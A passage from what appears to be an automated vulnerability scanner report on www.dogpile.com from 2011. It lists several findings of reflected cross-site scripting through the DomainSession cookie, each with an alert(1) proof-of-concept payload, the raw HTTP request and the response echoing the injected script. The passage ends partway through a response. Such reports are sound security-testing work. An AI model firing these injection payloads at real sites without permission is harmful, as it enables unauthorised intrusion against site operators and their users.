The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93152"-alert(1)-"816df919a4f was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=6c2d543d2bdb42469455c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:54 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=6c2d543d2bdb42469455c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; expires=Fri, 01 Apr 2011 17:35:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7886"-alert(1)-"78b4217b136 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=b537cbedf58a457f8f53c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:22 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:22 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:22 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677176027; path=/
Set-Cookie: wsRecent=GE+Zero+Taxes,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:23 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 160992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=b537cbedf58a457f8f53c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136; expires=Fri, 01 Apr 2011 17:19:22 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b73"-alert(1)-"6a66de51dba was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=3d0f54f01437428e97eec16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:33 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676993418; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:33 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=3d0f54f01437428e97eec16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; expires=Fri, 01 Apr 2011 17:16:33 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b56e7"-alert(1)-"2b8c3a90ea was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=5b843be01d96476c9873c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=6d731ec229be41909e32c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:21:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:01:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:01:51 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=6d731ec229be41909e32c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea; expires=Fri, 01 Apr 2011 17:21:52 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a4fb"-alert(1)-"9c0762a1d15 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fe86ba7b839e447e97c1c16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=c871e3a9db9b43a0819cc16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:21:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:01:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:01:52 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=c871e3a9db9b43a0819cc16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15; expires=Fri, 01 Apr 2011 17:21:52 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193eb"-alert(1)-"b095a032310 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/index/?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=28f8ba9483394dd6935dc16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:21 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:21 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:21 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=28f8ba9483394dd6935dc16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310; expires=Fri, 01 Apr 2011 17:29:21 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /favicon.ico

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55c43"-alert(1)-"46f043feb84 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=d139d0f78e1a40d2844cc16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:07:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=d139d0f78e1a40d2844cc16a3af0cb01&ActionId=731818522a4c460a8c29c16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:27:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:07:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:07:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:07:56 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=d139d0f78e1a40d2844cc16a3af0cb01&ActionId=731818522a4c460a8c29c16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; expires=Fri, 01 Apr 2011 17:27:57 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/Web6c5ea//'

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df86"-alert(1)-"c22c881b4b3 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/Web6c5ea//';Alert(%22Xss%22)//E445c104ee1/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
